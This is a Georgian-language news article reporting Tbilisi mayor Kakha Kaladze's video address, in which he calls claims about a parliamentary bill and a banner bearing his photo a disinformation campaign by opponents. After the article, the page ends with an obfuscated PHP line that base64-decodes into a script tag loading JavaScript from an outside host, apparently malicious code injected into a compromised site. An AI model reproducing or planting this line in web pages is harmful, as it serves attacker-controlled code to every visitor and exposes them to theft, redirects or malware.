celsiusi
ავერსი საქკაბელი
მხოლოდ ღირსეული, დამოუკიდებელი და ინფორმირებული საზოგადოება შეძლებს, მიიყვანოს ქვეყანა დასახულ მიზნამდე, – ამის შესახებ თბილისის მერმა, კახა კალაძემ ვიდეომიმართვაში განაცხადა.
მისი თქმით, პარლამენტში ინიციირებულ კანონთან დაკავშირებით სიცრუე ვრცელდებოდა.
„მინდა, გაჩვენოთ, როგორ მუშაობს მათი ბინძური პროპაგანდა: ერთი, რომ ამ კანონთან დაკავშირებით მთელი ან ხნის განმავლობაში სიცრუეს ავრცელებდნენ, ერთი შლეიფი მოაბეს, რომ ვითომ რუსული კანონია, რაც სიმართლეს საერთოდ არ შეესაბამება, და მეორე – სოციალურ ქსელში გაავრცელეს რაღაც ბანერი ჩემი ფოტოთი და დააწერეს, თითქოს მე ევროპის მოსურნე ადამიანებს (ჩვენ, ყველას ევროპა გვინდა) საქართველოს დატოვებისა და ევროპაში წასვლისკენ მოვუწოდებდი – იცით, სად არის აეროპორტი, დაჯექით და გაფრინდით. ასეთი სიბინძურეებით ცდილობენ, საზოგადოება შეიყვანონ შეცდომაში, თუმცა დღეს გვაქვს შესაძლებლობა, რომ სრული და ზუსტი ინფორმაცია მოგაწოდოთ. თუმცა ვიღაც რომ წაიკითხავდა ამას, შეიძლება, ეჭვი გასჩენოდა, რომ მართლა ვთქვი თუ არა ასეთი რამ. რა თქმა უნდა, მსგავსი არაფერი მითქვამს, ეს არის სიცრუე და ყალბი კამპანია, რომელსაც ჩვენი პოლიტიკური ოპონენტები აწარმოებენ“, – აღნიშნა კახა კალაძემ.
კახა კალაძის თქმით, მოუწოდებს ყველას, არ აყვნენ დეზინფორმაციას და მიიღონ სრულფასოვანი ინფორმაცია იმ საკითხების შესახებ, რომელთან დაკავშირებითაც საკუთარი მოსაზრების გამოხატვას მიიჩნევენ საჭიროდ.
„ჩემო მეგობრებო, მხოლოდ ღირსეული, დამოუკიდებელი და ინფორმირებული საზოგადოება შეძლებს, მიიყვანოს ქვეყანა დასახულ მიზნამდე. თუ რაციონალურად არ ვიმოქმედებთ, ევროპაც უკან მოგვრჩება, დამოუკიდებლობაც და მშვიდობაც, რასაც ჩვენი შვილები არ გვაპატიებენ. ცოტა ვრცელი ვიდეომიმართვა გამომივიდა, თუმცა ბოლოს ერთი რამ მინდა, ვთქვა: ერთად ვიაროთ ღირსებით ევროპისკენ“, – განაცხადა კახა კალაძემ.
270
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");